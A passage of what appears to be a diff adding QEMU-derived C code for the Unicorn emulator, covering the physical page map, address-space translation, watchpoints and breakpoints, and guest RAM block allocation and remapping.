It is only valid inside + cpu_exec() */ +//DEFINE_TLS(CPUState *, current_cpu); + +typedef struct PhysPageEntry PhysPageEntry; + +struct PhysPageEntry { + /* How many bits skip to next level (in units of L2_SIZE). 0 for a leaf. */ + uint32_t skip : 6; + /* index into phys_sections (!skip) or phys_map_nodes (skip) */ + uint32_t ptr : 26; +}; + +#define PHYS_MAP_NODE_NIL (((uint32_t)~0) >> 6) + +/* Size of the L2 (and L3, etc) page tables. */ +#define ADDR_SPACE_BITS 64 + +#define P_L2_BITS 9 +#define P_L2_SIZE (1 << P_L2_BITS) + +#define P_L2_LEVELS (((ADDR_SPACE_BITS - TARGET_PAGE_BITS - 1) / P_L2_BITS) + 1) + +typedef PhysPageEntry Node[P_L2_SIZE]; + +typedef struct PhysPageMap { + unsigned sections_nb; + unsigned sections_nb_alloc; + unsigned nodes_nb; + unsigned nodes_nb_alloc; + Node *nodes; + MemoryRegionSection *sections; +} PhysPageMap; + +struct AddressSpaceDispatch { + /* This is a multi-level map on the physical address space. + * The bottom level has pointers to MemoryRegionSections. 
+ */ + PhysPageEntry phys_map; + PhysPageMap map; + AddressSpace *as; +}; + +#define SUBPAGE_IDX(addr) ((addr) & ~TARGET_PAGE_MASK) +typedef struct subpage_t { + MemoryRegion iomem; + AddressSpace *as; + hwaddr base; + uint16_t sub_section[TARGET_PAGE_SIZE]; +} subpage_t; + +#define PHYS_SECTION_UNASSIGNED 0 +#define PHYS_SECTION_NOTDIRTY 1 +#define PHYS_SECTION_ROM 2 +#define PHYS_SECTION_WATCH 3 + +static void memory_map_init(struct uc_struct *uc); +static void tcg_commit(MemoryListener *listener); + +#endif + +#if !defined(CONFIG_USER_ONLY) + +static void phys_map_node_reserve(PhysPageMap *map, unsigned nodes) +{ + if (map->nodes_nb + nodes > map->nodes_nb_alloc) { + map->nodes_nb_alloc = MAX(map->nodes_nb_alloc * 2, 16); + map->nodes_nb_alloc = MAX(map->nodes_nb_alloc, map->nodes_nb + nodes); + map->nodes = g_renew(Node, map->nodes, map->nodes_nb_alloc); + } +} + +static uint32_t phys_map_node_alloc(PhysPageMap *map) +{ + unsigned i; + uint32_t ret; + + ret = map->nodes_nb++; + assert(ret != PHYS_MAP_NODE_NIL); + assert(ret != map->nodes_nb_alloc); + for (i = 0; i < P_L2_SIZE; ++i) { + map->nodes[ret][i].skip = 1; + map->nodes[ret][i].ptr = PHYS_MAP_NODE_NIL; + } + return ret; +} + +static void phys_page_set_level(PhysPageMap *map, PhysPageEntry *lp, + hwaddr *index, hwaddr *nb, uint16_t leaf, + int level) +{ + PhysPageEntry *p; + int i; + hwaddr step = (hwaddr)1 << (level * P_L2_BITS); + + if (lp->skip && lp->ptr == PHYS_MAP_NODE_NIL) { + lp->ptr = phys_map_node_alloc(map); + p = map->nodes[lp->ptr]; + if (level == 0) { + for (i = 0; i < P_L2_SIZE; i++) { + p[i].skip = 0; + p[i].ptr = PHYS_SECTION_UNASSIGNED; + } + } + } else { + p = map->nodes[lp->ptr]; + } + lp = &p[(*index >> (level * P_L2_BITS)) & (P_L2_SIZE - 1)]; + + while (*nb && lp < &p[P_L2_SIZE]) { + if ((*index & (step - 1)) == 0 && *nb >= step) { + lp->skip = 0; + lp->ptr = leaf; + *index += step; + *nb -= step; + } else { + phys_page_set_level(map, lp, index, nb, leaf, level - 1); + } + ++lp; + } 
+} + +static void phys_page_set(AddressSpaceDispatch *d, + hwaddr index, hwaddr nb, + uint16_t leaf) +{ + /* Wildly overreserve - it doesn't matter much. */ + phys_map_node_reserve(&d->map, 3 * P_L2_LEVELS); + + phys_page_set_level(&d->map, &d->phys_map, &index, &nb, leaf, P_L2_LEVELS - 1); +} + +/* Compact a non leaf page entry. Simply detect that the entry has a single child, + * and update our entry so we can skip it and go directly to the destination. + */ +static void phys_page_compact(PhysPageEntry *lp, Node *nodes, unsigned long *compacted) +{ + unsigned valid_ptr = P_L2_SIZE; + int valid = 0; + PhysPageEntry *p; + int i; + + if (lp->ptr == PHYS_MAP_NODE_NIL) { + return; + } + + p = nodes[lp->ptr]; + for (i = 0; i < P_L2_SIZE; i++) { + if (p[i].ptr == PHYS_MAP_NODE_NIL) { + continue; + } + + valid_ptr = i; + valid++; + if (p[i].skip) { + phys_page_compact(&p[i], nodes, compacted); + } + } + + /* We can only compress if there's only one child. */ + if (valid != 1) { + return; + } + + assert(valid_ptr < P_L2_SIZE); + + /* Don't compress if it won't fit in the # of bits we have. */ + if (lp->skip + p[valid_ptr].skip >= (1 << 3)) { + return; + } + + lp->ptr = p[valid_ptr].ptr; + if (!p[valid_ptr].skip) { + /* If our only child is a leaf, make this a leaf. */ + /* By design, we should have made this node a leaf to begin with so we + * should never reach here. + * But since it's so simple to handle this, let's do it just in case we + * change this rule. 
+         */
+        lp->skip = 0;
+    } else {
+        lp->skip += p[valid_ptr].skip;
+    }
+}
+
+static void phys_page_compact_all(AddressSpaceDispatch *d, int nodes_nb)
+{
+    //DECLARE_BITMAP(compacted, nodes_nb);
+    // this isnt actually used
+    unsigned long* compacted = NULL;
+
+    if (d->phys_map.skip) {
+        phys_page_compact(&d->phys_map, d->map.nodes, compacted);
+    }
+}
+
+static MemoryRegionSection *phys_page_find(PhysPageEntry lp, hwaddr addr,
+                                           Node *nodes, MemoryRegionSection *sections)
+{
+    PhysPageEntry *p;
+    hwaddr index = addr >> TARGET_PAGE_BITS;
+    int i;
+
+    for (i = P_L2_LEVELS; lp.skip && (i -= lp.skip) >= 0;) {
+        if (lp.ptr == PHYS_MAP_NODE_NIL) {
+            return &sections[PHYS_SECTION_UNASSIGNED];
+        }
+        p = nodes[lp.ptr];
+        lp = p[(index >> (i * P_L2_BITS)) & (P_L2_SIZE - 1)];
+    }
+
+    if (sections[lp.ptr].size.hi ||
+        range_covers_byte(sections[lp.ptr].offset_within_address_space,
+                          sections[lp.ptr].size.lo, addr)) {
+        return &sections[lp.ptr];
+    } else {
+        return &sections[PHYS_SECTION_UNASSIGNED];
+    }
+}
+
+bool memory_region_is_unassigned(struct uc_struct* uc, MemoryRegion *mr)
+{
+    return mr != &uc->io_mem_rom && mr != &uc->io_mem_notdirty &&
+        !mr->rom_device && mr != &uc->io_mem_watch;
+}
+
+static MemoryRegionSection *address_space_lookup_region(AddressSpaceDispatch *d,
+                                                        hwaddr addr,
+                                                        bool resolve_subpage)
+{
+    MemoryRegionSection *section;
+    subpage_t *subpage;
+
+    section = phys_page_find(d->phys_map, addr, d->map.nodes, d->map.sections);
+    if (resolve_subpage && section->mr->subpage) {
+        subpage = container_of(section->mr, subpage_t, iomem);
+        section = &d->map.sections[subpage->sub_section[SUBPAGE_IDX(addr)]];
+    }
+    return section;
+}
+
+static MemoryRegionSection *
+address_space_translate_internal(AddressSpaceDispatch *d, hwaddr addr, hwaddr *xlat,
+                                 hwaddr *plen, bool resolve_subpage)
+{
+    MemoryRegionSection *section;
+    Int128 diff;
+
+    section = address_space_lookup_region(d, addr, resolve_subpage);
+    /* Compute offset within MemoryRegionSection */
+    addr -= 
section->offset_within_address_space; + + /* Compute offset within MemoryRegion */ + *xlat = addr + section->offset_within_region; + + diff = int128_sub(section->mr->size, int128_make64(addr)); + *plen = int128_get64(int128_min(diff, int128_make64(*plen))); + return section; +} + +static inline bool memory_access_is_direct(MemoryRegion *mr, bool is_write) +{ + if (memory_region_is_ram(mr)) { + return !(is_write && mr->readonly); + } + if (memory_region_is_romd(mr)) { + return !is_write; + } + + return false; +} + +MemoryRegion *address_space_translate(AddressSpace *as, hwaddr addr, + hwaddr *xlat, hwaddr *plen, + bool is_write) +{ + IOMMUTLBEntry iotlb; + MemoryRegionSection *section; + MemoryRegion *mr; + hwaddr len = *plen; + + for (;;) { + section = address_space_translate_internal(as->dispatch, addr, &addr, plen, true); + mr = section->mr; + if (mr->ops == NULL) + return NULL; + + if (!mr->iommu_ops) { + break; + } + + iotlb = mr->iommu_ops->translate(mr, addr, is_write); + addr = ((iotlb.translated_addr & ~iotlb.addr_mask) + | (addr & iotlb.addr_mask)); + len = MIN(len, (addr | iotlb.addr_mask) - addr + 1); + if (!(iotlb.perm & (1 << is_write))) { + mr = &as->uc->io_mem_unassigned; + break; + } + + as = iotlb.target_as; + } + + *plen = len; + *xlat = addr; + return mr; +} + +MemoryRegionSection * +address_space_translate_for_iotlb(AddressSpace *as, hwaddr addr, hwaddr *xlat, + hwaddr *plen) +{ + MemoryRegionSection *section; + section = address_space_translate_internal(as->dispatch, addr, xlat, plen, false); + + assert(!section->mr->iommu_ops); + return section; +} +#endif + +CPUState *qemu_get_cpu(struct uc_struct *uc, int index) +{ + CPUState *cpu = uc->cpu; + if (cpu->cpu_index == index) { + return cpu; + } + return NULL; +} + +#if !defined(CONFIG_USER_ONLY) +void tcg_cpu_address_space_init(CPUState *cpu, AddressSpace *as) +{ + /* We only support one address space per cpu at the moment. 
*/ + assert(cpu->as == as); + + if (cpu->tcg_as_listener) { + memory_listener_unregister(as->uc, cpu->tcg_as_listener); + } else { + cpu->tcg_as_listener = g_new0(MemoryListener, 1); + } + cpu->tcg_as_listener->commit = tcg_commit; + memory_listener_register(as->uc, cpu->tcg_as_listener, as); +} +#endif + +void cpu_exec_init(CPUArchState *env, void *opaque) +{ + struct uc_struct *uc = opaque; + CPUState *cpu = ENV_GET_CPU(env); + + cpu->uc = uc; + env->uc = uc; + + cpu->cpu_index = 0; + cpu->numa_node = 0; + QTAILQ_INIT(&cpu->breakpoints); + QTAILQ_INIT(&cpu->watchpoints); + + cpu->as = &uc->as; + + // TODO: assert uc does not already have a cpu? + uc->cpu = cpu; +} + +#if defined(TARGET_HAS_ICE) +#if defined(CONFIG_USER_ONLY) +static void breakpoint_invalidate(CPUState *cpu, target_ulong pc) +{ + tb_invalidate_phys_page_range(pc, pc + 1, 0); +} +#else +static void breakpoint_invalidate(CPUState *cpu, target_ulong pc) +{ + hwaddr phys = cpu_get_phys_page_debug(cpu, pc); + if (phys != -1) { + tb_invalidate_phys_addr(cpu->as, + phys | (pc & ~TARGET_PAGE_MASK)); + } +} +#endif +#endif /* TARGET_HAS_ICE */ + +#if defined(CONFIG_USER_ONLY) +void cpu_watchpoint_remove_all(CPUState *cpu, int mask) + +{ +} + +int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, vaddr len, + int flags) +{ + return -ENOSYS; +} + +void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint) +{ +} + +int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, + int flags, CPUWatchpoint **watchpoint) +{ + return -ENOSYS; +} +#else +/* Add a watchpoint. 
*/ +int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, + int flags, CPUWatchpoint **watchpoint) +{ + CPUWatchpoint *wp; + + /* forbid ranges which are empty or run off the end of the address space */ + if (len == 0 || (addr + len - 1) < addr) { + return -EINVAL; + } + wp = g_malloc(sizeof(*wp)); + + wp->vaddr = addr; + wp->len = len; + wp->flags = flags; + + /* keep all GDB-injected watchpoints in front */ + if (flags & BP_GDB) { + QTAILQ_INSERT_HEAD(&cpu->watchpoints, wp, entry); + } else { + QTAILQ_INSERT_TAIL(&cpu->watchpoints, wp, entry); + } + + tlb_flush_page(cpu, addr); + + if (watchpoint) + *watchpoint = wp; + return 0; +} + +/* Remove a specific watchpoint. */ +int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, vaddr len, + int flags) +{ + CPUWatchpoint *wp; + + QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { + if (addr == wp->vaddr && len == wp->len + && flags == (wp->flags & ~BP_WATCHPOINT_HIT)) { + cpu_watchpoint_remove_by_ref(cpu, wp); + return 0; + } + } + return -ENOENT; +} + +/* Remove a specific watchpoint by reference. */ +void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint) +{ + QTAILQ_REMOVE(&cpu->watchpoints, watchpoint, entry); + + tlb_flush_page(cpu, watchpoint->vaddr); + + g_free(watchpoint); +} + +/* Remove all matching watchpoints. */ +void cpu_watchpoint_remove_all(CPUState *cpu, int mask) +{ + CPUWatchpoint *wp, *next; + + QTAILQ_FOREACH_SAFE(wp, &cpu->watchpoints, entry, next) { + if (wp->flags & mask) { + cpu_watchpoint_remove_by_ref(cpu, wp); + } + } +} + +/* Return true if this watchpoint address matches the specified + * access (ie the address range covered by the watchpoint overlaps + * partially or completely with the address range covered by the + * access). 
+ */ +static inline bool cpu_watchpoint_address_matches(CPUWatchpoint *wp, + vaddr addr, + vaddr len) +{ + /* We know the lengths are non-zero, but a little caution is + * required to avoid errors in the case where the range ends + * exactly at the top of the address space and so addr + len + * wraps round to zero. + */ + vaddr wpend = wp->vaddr + wp->len - 1; + vaddr addrend = addr + len - 1; + + return !(addr > wpend || wp->vaddr > addrend); +} + +#endif + +/* Add a breakpoint. */ +int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, + CPUBreakpoint **breakpoint) +{ +#if defined(TARGET_HAS_ICE) + CPUBreakpoint *bp; + + bp = g_malloc(sizeof(*bp)); + + bp->pc = pc; + bp->flags = flags; + + /* keep all GDB-injected breakpoints in front */ + if (flags & BP_GDB) { + QTAILQ_INSERT_HEAD(&cpu->breakpoints, bp, entry); + } else { + QTAILQ_INSERT_TAIL(&cpu->breakpoints, bp, entry); + } + + breakpoint_invalidate(cpu, pc); + + if (breakpoint) { + *breakpoint = bp; + } + return 0; +#else + return -ENOSYS; +#endif +} + +/* Remove a specific breakpoint. */ +int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags) +{ +#if defined(TARGET_HAS_ICE) + CPUBreakpoint *bp; + + QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) { + if (bp->pc == pc && bp->flags == flags) { + cpu_breakpoint_remove_by_ref(cpu, bp); + return 0; + } + } + return -ENOENT; +#else + return -ENOSYS; +#endif +} + +/* Remove a specific breakpoint by reference. */ +void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint) +{ +#if defined(TARGET_HAS_ICE) + QTAILQ_REMOVE(&cpu->breakpoints, breakpoint, entry); + + breakpoint_invalidate(cpu, breakpoint->pc); + + g_free(breakpoint); +#endif +} + +/* Remove all matching breakpoints. 
*/ +void cpu_breakpoint_remove_all(CPUState *cpu, int mask) +{ +#if defined(TARGET_HAS_ICE) + CPUBreakpoint *bp, *next; + + QTAILQ_FOREACH_SAFE(bp, &cpu->breakpoints, entry, next) { + if (bp->flags & mask) { + cpu_breakpoint_remove_by_ref(cpu, bp); + } + } +#endif +} + +/* enable or disable single step mode. EXCP_DEBUG is returned by the + CPU loop after each instruction */ +void cpu_single_step(CPUState *cpu, int enabled) +{ +#if defined(TARGET_HAS_ICE) + if (cpu->singlestep_enabled != enabled) { + CPUArchState *env; + cpu->singlestep_enabled = enabled; + /* must flush all the translated code to avoid inconsistencies */ + /* XXX: only flush what is necessary */ + env = cpu->env_ptr; + tb_flush(env); + } +#endif +} + +void cpu_abort(CPUState *cpu, const char *fmt, ...) +{ + va_list ap; + va_list ap2; + + va_start(ap, fmt); + va_copy(ap2, ap); + fprintf(stderr, "qemu: fatal: "); + vfprintf(stderr, fmt, ap); + fprintf(stderr, "\n"); + cpu_dump_state(cpu, stderr, fprintf, CPU_DUMP_FPU | CPU_DUMP_CCOP); + if (qemu_log_enabled()) { + qemu_log("qemu: fatal: "); + qemu_log_vprintf(fmt, ap2); + qemu_log("\n"); + log_cpu_state(cpu, CPU_DUMP_FPU | CPU_DUMP_CCOP); + qemu_log_flush(); + qemu_log_close(); + } + va_end(ap2); + va_end(ap); +#if defined(CONFIG_USER_ONLY) + { + struct sigaction act; + sigfillset(&act.sa_mask); + act.sa_handler = SIG_DFL; + sigaction(SIGABRT, &act, NULL); + } +#endif + abort(); +} + +#if !defined(CONFIG_USER_ONLY) +static RAMBlock *qemu_get_ram_block(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + /* The list is protected by the iothread lock here. 
*/ + block = uc->ram_list.mru_block; + if (block && addr - block->offset < block->length) { + goto found; + } + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr - block->offset < block->length) { + goto found; + } + } + + fprintf(stderr, "Bad ram offset %" PRIx64 "\n", (uint64_t)addr); + abort(); + +found: + uc->ram_list.mru_block = block; + return block; +} + +static void tlb_reset_dirty_range_all(struct uc_struct* uc, + ram_addr_t start, ram_addr_t length) +{ + ram_addr_t start1; + RAMBlock *block; + ram_addr_t end; + + end = TARGET_PAGE_ALIGN(start + length); + start &= TARGET_PAGE_MASK; + + block = qemu_get_ram_block(uc, start); + assert(block == qemu_get_ram_block(uc, end - 1)); + start1 = (uintptr_t)block->host + (start - block->offset); + cpu_tlb_reset_dirty_all(uc, start1, length); +} + +/* Note: start and end must be within the same ram block. */ +void cpu_physical_memory_reset_dirty(struct uc_struct* uc, + ram_addr_t start, ram_addr_t length, unsigned client) +{ + if (length == 0) + return; + cpu_physical_memory_clear_dirty_range(uc, start, length, client); + + if (tcg_enabled(uc)) { + tlb_reset_dirty_range_all(uc, start, length); + } +} + +hwaddr memory_region_section_get_iotlb(CPUState *cpu, + MemoryRegionSection *section, + target_ulong vaddr, + hwaddr paddr, hwaddr xlat, + int prot, + target_ulong *address) +{ + hwaddr iotlb; + CPUWatchpoint *wp; + + if (memory_region_is_ram(section->mr)) { + /* Normal RAM. */ + iotlb = (memory_region_get_ram_addr(section->mr) & TARGET_PAGE_MASK) + + xlat; + if (!section->readonly) { + iotlb |= PHYS_SECTION_NOTDIRTY; + } else { + iotlb |= PHYS_SECTION_ROM; + } + } else { + iotlb = section - section->address_space->dispatch->map.sections; + iotlb += xlat; + } + + /* Make accesses to pages with watchpoints go via the + watchpoint trap routines. 
*/ + QTAILQ_FOREACH(wp, &cpu->watchpoints, entry) { + if (cpu_watchpoint_address_matches(wp, vaddr, TARGET_PAGE_SIZE)) { + /* Avoid trapping reads of pages with a write breakpoint. */ + if ((prot & PAGE_WRITE) || (wp->flags & BP_MEM_READ)) { + iotlb = PHYS_SECTION_WATCH + paddr; + *address |= TLB_MMIO; + break; + } + } + } + + return iotlb; +} +#endif /* defined(CONFIG_USER_ONLY) */ + +#if !defined(CONFIG_USER_ONLY) + +static int subpage_register (subpage_t *mmio, uint32_t start, uint32_t end, + uint16_t section); +static subpage_t *subpage_init(AddressSpace *as, hwaddr base); + +static void *(*phys_mem_alloc)(size_t size, uint64_t *align) = +qemu_anon_ram_alloc; + +/* + * Set a custom physical guest memory alloator. + * Accelerators with unusual needs may need this. Hopefully, we can + * get rid of it eventually. + */ +void phys_mem_set_alloc(void *(*alloc)(size_t, uint64_t *align)) +{ + phys_mem_alloc = alloc; +} + +static uint16_t phys_section_add(PhysPageMap *map, + MemoryRegionSection *section) +{ + /* The physical section number is ORed with a page-aligned + * pointer to produce the iotlb entries. Thus it should + * never overflow into the page-aligned value. 
+ */ + assert(map->sections_nb < TARGET_PAGE_SIZE); + + if (map->sections_nb == map->sections_nb_alloc) { + map->sections_nb_alloc = MAX(map->sections_nb_alloc * 2, 16); + map->sections = g_renew(MemoryRegionSection, map->sections, + map->sections_nb_alloc); + } + map->sections[map->sections_nb] = *section; + memory_region_ref(section->mr); + return map->sections_nb++; +} + +static void phys_section_destroy(MemoryRegion *mr) +{ + memory_region_unref(mr); + + if (mr->subpage) { + subpage_t *subpage = container_of(mr, subpage_t, iomem); + object_unref(mr->uc, OBJECT(&subpage->iomem)); + g_free(subpage); + } +} + +static void phys_sections_free(PhysPageMap *map) +{ + while (map->sections_nb > 0) { + MemoryRegionSection *section = &map->sections[--map->sections_nb]; + phys_section_destroy(section->mr); + } + g_free(map->sections); + g_free(map->nodes); +} + +static void register_subpage(struct uc_struct* uc, + AddressSpaceDispatch *d, MemoryRegionSection *section) +{ + subpage_t *subpage; + hwaddr base = section->offset_within_address_space + & TARGET_PAGE_MASK; + MemoryRegionSection *existing = phys_page_find(d->phys_map, base, + d->map.nodes, d->map.sections); + hwaddr start, end; + MemoryRegionSection subsection = MemoryRegionSection_make(NULL, NULL, 0, int128_make64(TARGET_PAGE_SIZE), base, false); + + assert(existing->mr->subpage || existing->mr == &uc->io_mem_unassigned); + + if (!(existing->mr->subpage)) { + subpage = subpage_init(d->as, base); + subsection.address_space = d->as; + subsection.mr = &subpage->iomem; + phys_page_set(d, base >> TARGET_PAGE_BITS, 1, + phys_section_add(&d->map, &subsection)); + } else { + subpage = container_of(existing->mr, subpage_t, iomem); + } + start = section->offset_within_address_space & ~TARGET_PAGE_MASK; + end = start + int128_get64(section->size) - 1; + subpage_register(subpage, start, end, + phys_section_add(&d->map, section)); + //g_free(subpage); +} + + +static void register_multipage(AddressSpaceDispatch *d, + 
MemoryRegionSection *section) +{ + hwaddr start_addr = section->offset_within_address_space; + uint16_t section_index = phys_section_add(&d->map, section); + uint64_t num_pages = int128_get64(int128_rshift(section->size, + TARGET_PAGE_BITS)); + + assert(num_pages); + phys_page_set(d, start_addr >> TARGET_PAGE_BITS, num_pages, section_index); +} + +static void mem_add(MemoryListener *listener, MemoryRegionSection *section) +{ + AddressSpace *as = container_of(listener, AddressSpace, dispatch_listener); + AddressSpaceDispatch *d = as->next_dispatch; + MemoryRegionSection now = *section, remain = *section; + Int128 page_size = int128_make64(TARGET_PAGE_SIZE); + + if (now.offset_within_address_space & ~TARGET_PAGE_MASK) { + uint64_t left = TARGET_PAGE_ALIGN(now.offset_within_address_space) + - now.offset_within_address_space; + + now.size = int128_min(int128_make64(left), now.size); + register_subpage(as->uc, d, &now); + } else { + now.size = int128_zero(); + } + while (int128_ne(remain.size, now.size)) { + remain.size = int128_sub(remain.size, now.size); + remain.offset_within_address_space += int128_get64(now.size); + remain.offset_within_region += int128_get64(now.size); + now = remain; + if (int128_lt(remain.size, page_size)) { + register_subpage(as->uc, d, &now); + } else if (remain.offset_within_address_space & ~TARGET_PAGE_MASK) { + now.size = page_size; + register_subpage(as->uc, d, &now); + } else { + now.size = int128_and(now.size, int128_neg(page_size)); + register_multipage(d, &now); + } + } +} + +#ifdef __linux__ + +#include <sys/vfs.h> + +#define HUGETLBFS_MAGIC 0x958458f6 + +#endif + +static ram_addr_t find_ram_offset(struct uc_struct *uc, ram_addr_t size) +{ + RAMBlock *block, *next_block; + ram_addr_t offset = RAM_ADDR_MAX, mingap = RAM_ADDR_MAX; + + assert(size != 0); /* it would hand out same offset multiple times */ + + if (QTAILQ_EMPTY(&uc->ram_list.blocks)) + return 0; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + ram_addr_t end, next 
= RAM_ADDR_MAX; + + end = block->offset + block->length; + + QTAILQ_FOREACH(next_block, &uc->ram_list.blocks, next) { + if (next_block->offset >= end) { + next = MIN(next, next_block->offset); + } + } + if (next - end >= size && next - end < mingap) { + offset = end; + mingap = next - end; + } + } + + if (offset == RAM_ADDR_MAX) { + fprintf(stderr, "Failed to find gap of requested size: %" PRIu64 "\n", + (uint64_t)size); + abort(); + } + + return offset; +} + +ram_addr_t last_ram_offset(struct uc_struct *uc) +{ + RAMBlock *block; + ram_addr_t last = 0; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) + last = MAX(last, block->offset + block->length); + + return last; +} + +static void qemu_ram_setup_dump(void *addr, ram_addr_t size) +{ +} + +static RAMBlock *find_ram_block(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (block->offset == addr) { + return block; + } + } + + return NULL; +} + +void qemu_ram_unset_idstr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = find_ram_block(uc, addr); + + if (block) { + memset(block->idstr, 0, sizeof(block->idstr)); + } +} + +static int memory_try_enable_merging(void *addr, size_t len) +{ + return 0; +} + +static ram_addr_t ram_block_add(struct uc_struct *uc, RAMBlock *new_block, Error **errp) +{ + RAMBlock *block; + ram_addr_t old_ram_size, new_ram_size; + + old_ram_size = last_ram_offset(uc) >> TARGET_PAGE_BITS; + + new_block->offset = find_ram_offset(uc, new_block->length); + + if (!new_block->host) { + new_block->host = phys_mem_alloc(new_block->length, + &new_block->mr->align); + if (!new_block->host) { + error_setg_errno(errp, errno, + "cannot set up guest memory '%s'", + memory_region_name(new_block->mr)); + return -1; + } + memory_try_enable_merging(new_block->host, new_block->length); + } + + /* Keep the list sorted from biggest to smallest block. 
*/ + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (block->length < new_block->length) { + break; + } + } + if (block) { + QTAILQ_INSERT_BEFORE(block, new_block, next); + } else { + QTAILQ_INSERT_TAIL(&uc->ram_list.blocks, new_block, next); + } + uc->ram_list.mru_block = NULL; + + uc->ram_list.version++; + + new_ram_size = last_ram_offset(uc) >> TARGET_PAGE_BITS; + + if (new_ram_size > old_ram_size) { + int i; + for (i = 0; i < DIRTY_MEMORY_NUM; i++) { + uc->ram_list.dirty_memory[i] = + bitmap_zero_extend(uc->ram_list.dirty_memory[i], + old_ram_size, new_ram_size); + } + } + cpu_physical_memory_set_dirty_range(uc, new_block->offset, new_block->length); + + qemu_ram_setup_dump(new_block->host, new_block->length); + //qemu_madvise(new_block->host, new_block->length, QEMU_MADV_HUGEPAGE); + //qemu_madvise(new_block->host, new_block->length, QEMU_MADV_DONTFORK); + + return new_block->offset; +} + +// return -1 on error +ram_addr_t qemu_ram_alloc_from_ptr(ram_addr_t size, void *host, + MemoryRegion *mr, Error **errp) +{ + RAMBlock *new_block; + ram_addr_t addr; + Error *local_err = NULL; + + size = TARGET_PAGE_ALIGN(size); + new_block = g_malloc0(sizeof(*new_block)); + if (new_block == NULL) + return -1; + + new_block->mr = mr; + new_block->length = size; + new_block->fd = -1; + new_block->host = host; + if (host) { + new_block->flags |= RAM_PREALLOC; + } + addr = ram_block_add(mr->uc, new_block, &local_err); + if (local_err) { + g_free(new_block); + error_propagate(errp, local_err); + return -1; + } + return addr; +} + +ram_addr_t qemu_ram_alloc(ram_addr_t size, MemoryRegion *mr, Error **errp) +{ + return qemu_ram_alloc_from_ptr(size, NULL, mr, errp); +} + +void qemu_ram_free_from_ptr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr == block->offset) { + QTAILQ_REMOVE(&uc->ram_list.blocks, block, next); + uc->ram_list.mru_block = NULL; + uc->ram_list.version++; + g_free(block); + 
break; + } + } +} + +void qemu_ram_free(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr == block->offset) { + QTAILQ_REMOVE(&uc->ram_list.blocks, block, next); + uc->ram_list.mru_block = NULL; + uc->ram_list.version++; + if (block->flags & RAM_PREALLOC) { + ; +#ifndef _WIN32 + } else if (block->fd >= 0) { + munmap(block->host, block->length); + close(block->fd); +#endif + } else { + qemu_anon_ram_free(block->host, block->length); + } + g_free(block); + break; + } + } +} + +#ifndef _WIN32 +void qemu_ram_remap(struct uc_struct *uc, ram_addr_t addr, ram_addr_t length) +{ + RAMBlock *block; + ram_addr_t offset; + int flags; + void *area, *vaddr; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + offset = addr - block->offset; + if (offset < block->length) { + vaddr = block->host + offset; + if (block->flags & RAM_PREALLOC) { + ; + } else { + flags = MAP_FIXED; + munmap(vaddr, length); + if (block->fd >= 0) { + flags |= (block->flags & RAM_SHARED ? + MAP_SHARED : MAP_PRIVATE); + area = mmap(vaddr, length, PROT_READ | PROT_WRITE, + flags, block->fd, offset); + } else { + /* + * Remap needs to match alloc. Accelerators that + * set phys_mem_alloc never remap. If they did, + * we'd need a remap hook here. 
+ */ + assert(phys_mem_alloc == qemu_anon_ram_alloc); + + flags |= MAP_PRIVATE | MAP_ANONYMOUS; + area = mmap(vaddr, length, PROT_READ | PROT_WRITE, + flags, -1, 0); + } + if (area == MAP_FAILED || area != vaddr) { + fprintf(stderr, "Could not remap addr: " + RAM_ADDR_FMT "@" RAM_ADDR_FMT "\n", + length, addr); + exit(1); + } + memory_try_enable_merging(vaddr, length); + qemu_ram_setup_dump(vaddr, length); + } + return; + } + } +} +#endif /* !_WIN32 */ + +int qemu_get_ram_fd(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = qemu_get_ram_block(uc, addr); + + return block->fd; +} + +void *qemu_get_ram_block_host_ptr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = qemu_get_ram_block(uc, addr); + + return block->host; +} + +/* Return a host pointer to ram allocated with qemu_ram_alloc. + With the exception of the softmmu code in this file, this should + only be used for local memory (e.g. video ram) that the device owns, + and knows it isn't going to access beyond the end of the block. + + It should not be used for general purpose DMA. + Use cpu_physical_memory_map/cpu_physical_memory_rw instead. + */ +void *qemu_get_ram_ptr(struct uc_struct *uc, ram_addr_t addr) +{ + RAMBlock *block = qemu_get_ram_block(uc, addr); + + return block->host + (addr - block->offset); +} + +/* Return a host pointer to guest's ram. 
